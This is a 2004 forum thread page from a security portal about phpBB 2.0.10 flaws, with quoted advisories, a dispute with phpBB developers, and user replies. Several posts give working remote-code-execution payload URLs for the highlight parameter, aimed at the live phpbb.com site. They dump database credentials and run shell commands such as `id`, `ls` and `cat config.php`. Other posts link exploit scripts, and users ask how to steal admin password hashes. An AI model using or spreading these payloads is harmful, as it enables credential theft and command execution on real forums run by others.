Waraxe IT Security Portal
Login or Register
July 18, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 207
Members: 0
Total: 207
Full disclosure
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
SEC Consult SA-20240620-0 :: Arbitrary File Upload in edu-sharing (metaVentis GmbH)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> vulns in phpbb 2.0.10 Goto page 1, 2, 3, 4Next
Post new topicReply to topic View previous topic :: View next topic
vulns in phpbb 2.0.10
PostPosted: Mon Nov 15, 2004 5:56 pm Reply with quote
hebe
Advanced user
Advanced user
Joined: Sep 04, 2004
Posts: 59




Quote:
| | | | | _ \ | |
| |_| | _____ __ | | | |__ _ _ __| | __
| _ |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V V / | |/ / (_| | | | <
\_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\
http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date: October 14, 2004
URL: http://www.howdark.com

Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com

Attack: SQL Injection, allowing people to minipulate the query into pulling data
they should not previously be able too obtain. (Such as passwords)

Description: Requiring the account be a moderator, or having a moderation session
with the correct cookie to actually execute this attack, it is not that big
of an issue, but it still is there.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

Including a F (forum), with a MODE, but without a T (topic) leads to SQL error.
But because of topic turning all user input values into numbers, the injection is
useless, unless a way around this was found.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

modcp.php?mode=[mode]&f=1&t=[SQL]&sid=[your mod session]

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Line: 801
----------------------------------------------------------------------------------------------------------------------------------

$sql = "SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username
FROM " . POSTS_TABLE . " p, " . USERS_TABLE . " u, " . POSTS_TEXT_TABLE . " pt
WHERE p.topic_id = $topic_id
AND p.poster_id = u.user_id
AND p.post_id = pt.post_id
ORDER BY p.post_time ASC";

----------------------------------------------------------------------------------------------------------------------------------
// Line: 806
----------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------
// SQL Error
----------------------------------------------------------------------------------------------------------------------------------

Could not get topic/post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND p.poster_id = u.user_id AND p.post_id = pt.post_id

SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username FROM htf_posts p, htf_users u, htf_posts_text pt WHERE p.topic_id = AND p.poster_id = u.user_id AND p.post_id = pt.post_id ORDER BY p.post_time ASC

Line : 809
File : modcp.php



2nd
Quote:
_ _ ______ _
| | | | | _ \ | |
| |_| | _____ __ | | | |__ _ _ __| | __
| _ |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V V / | |/ / (_| | | | <
\_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\
http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date: October 1, 2004
URL: http://www.howdark.com

Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com

Attack: SQL Injection, allowing people to minipulate the query into pulling data
they should not previously be able too obtain. (Such as passwords)
Arbituary EXEC allows you, if you can get on to a new line, to execute
your own PHP, which can be fatal.

Description: Because of the way urldecode and magic quotes works,
it turns %2527 into %27, which is a single quote, and it
leaves it unslashed. This gives you a SQL Injection, leading
to arbituary PHP exec hole. But because you can't get outside
preg_replace because of magic quotes, this is very very useless.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

Highlighting %2527 on any topic.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

viewtopic.php?t=1&highlight=%2527

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Error
----------------------------------------------------------------------------------------------------------------------------------

Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1

Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>[POST TEXT HERE]<') in viewtopic.php on line 1109

---------------------------------------------------------------------------------------------------------


psoftx write that in the phpbb comunity
Code:
We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.

The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).

The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.
View user's profile Send private message
PostPosted: Mon Nov 15, 2004 11:58 pm Reply with quote
jessica
Regular user
Regular user
Joined: Sep 18, 2004
Posts: 5




Quote:
-----------------------------------------------------------------------------------------------------
// Updates
-----------------------------------------------------------------------------------------------------

Just a note on the phpBB finds, they are NOT SQL Injection issues,
they are just poorly coded errors, as I had stated.

This is just immature of the phpBB Group to say we were presistant
about these, considering they were not submitted to BugTRAQ because
we knew for a fact they were useless.

The highlight error, as I stated is not harmful under the circumstances
of the default code, but if presented with minor changes, which is known
to some widely known phpBB Boards, they could present problems.

The highlight error is NOT, and I repeat NOT, SQL Injection, I am sorry
for the misworded presentation. I found this awhile ago, and I asked
a friend, who is well knowledged about these subjects, what to label
this with the options I had for the phpBB Security Tracker, and this is
what he gave me.

I did not check over what I sent, stupidly, and that is how it was sent out.
Sorry for the incovience

Keep note, that these would not even be on BugTRAQ if phpBB were
not immature about the bug reports I gave them, and they mildly ignored.
View user's profile Send private message Visit poster's website AIM Address
PostPosted: Wed Nov 17, 2004 2:30 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




psoftx write that in the phpbb comunity
Code:
We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.

The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).

The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.

----------------------------------

PHPBB developers read read read ERROR ERROR

WTF xD

Good work Jessica
View user's profile Send private message Visit poster's website
PostPosted: Thu Nov 18, 2004 1:47 am Reply with quote
jessica
Regular user
Regular user
Joined: Sep 18, 2004
Posts: 5




Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps
View user's profile Send private message Visit poster's website AIM Address
PostPosted: Thu Nov 18, 2004 7:17 am Reply with quote
hebe
Advanced user
Advanced user
Joined: Sep 04, 2004
Posts: 59




jessica wrote:
Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps

hahah they must patch now
and also these
1. "username" is $dbuser:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbuser.%2527

2. "username" is $dbpasswd:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbpasswd.%2527

3. "username" is $dbname:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbname.%2527

4. "username" is result of passthru("id"):
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`id`.%2527
"username" is result of passthru("ls"):
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`ls`.%2527
View user's profile Send private message
PostPosted: Thu Nov 18, 2004 8:03 am Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




OMG very nice Laughing Laughing Laughing Laughing Laughing
View user's profile Send private message Visit poster's website
PostPosted: Thu Nov 18, 2004 10:53 am Reply with quote
hebe
Advanced user
Advanced user
Joined: Sep 04, 2004
Posts: 59




jessica wrote:
Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps


this only works in win servers ?
"/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527";
cmd?
View user's profile Send private message
PostPosted: Thu Nov 18, 2004 1:05 pm Reply with quote
jessica
Regular user
Regular user
Joined: Sep 18, 2004
Posts: 5




no, it'll work on most os's

It'll just limit it to what OS it is.. i.e: unix is ls, and windows is dir.

It isn't very useful because you are logged in as no user, so you don't have write permission or anything, so you can read like config.php (cat config.php on unix) and you have to view the page source since config.php has <? ?> and the page parses it thinking it's html.

But other then that you are pretty much out of luck.

CMD Example Script is here:
http://www.howdark.com/exploit
View user's profile Send private message Visit poster's website AIM Address
PostPosted: Thu Nov 18, 2004 1:11 pm Reply with quote
jessica
Regular user
Regular user
Joined: Sep 18, 2004
Posts: 5




And just to think phpBB devs reported me to my ISP for trying to help them with this.

assholes.
View user's profile Send private message Visit poster's website AIM Address
PostPosted: Fri Nov 19, 2004 3:15 am Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




jessica you need host for exploits send pm Surprised
View user's profile Send private message Visit poster's website
PostPosted: Sun Nov 21, 2004 1:57 pm Reply with quote
sygma
Regular user
Regular user
Joined: Nov 21, 2004
Posts: 7




Quote:
&highlight=%2527.$poster=$dbname.%2527


is there a way i could make a SQL query and thus obtain the admin's hashed password ?

_________________
[i]no word to save thee[/i]
View user's profile Send private message
PostPosted: Sun Nov 21, 2004 10:14 pm Reply with quote
kranium
Regular user
Regular user
Joined: Jun 27, 2004
Posts: 7




sygma wrote:
Quote:
&highlight=%2527.$poster=$dbname.%2527


is there a way i could make a SQL query and thus obtain the admin's hashed password ?


yes i wish i could do that too. i used the exploit in http://www.howdark.com/exploit/ but everytime i try some SQL query it shows me NOTHING Sad any ideas?
View user's profile Send private message
PostPosted: Mon Nov 22, 2004 9:34 pm Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




Dont work for me...

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Tue Nov 23, 2004 3:59 am Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




SteX wrote:
Dont work for me...



what not work stex? i test work nice Laughing

exploit work in all phpbb forums 2.0.* - 2.0.10
View user's profile Send private message Visit poster's website
a
PostPosted: Tue Nov 23, 2004 2:33 pm Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




What did you entered in SQL tab..?

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
vulns in phpbb 2.0.10
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 4
Goto page 1, 2, 3, 4Next
Post new topicReply to topic


Powered by phpBB 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.127 Seconds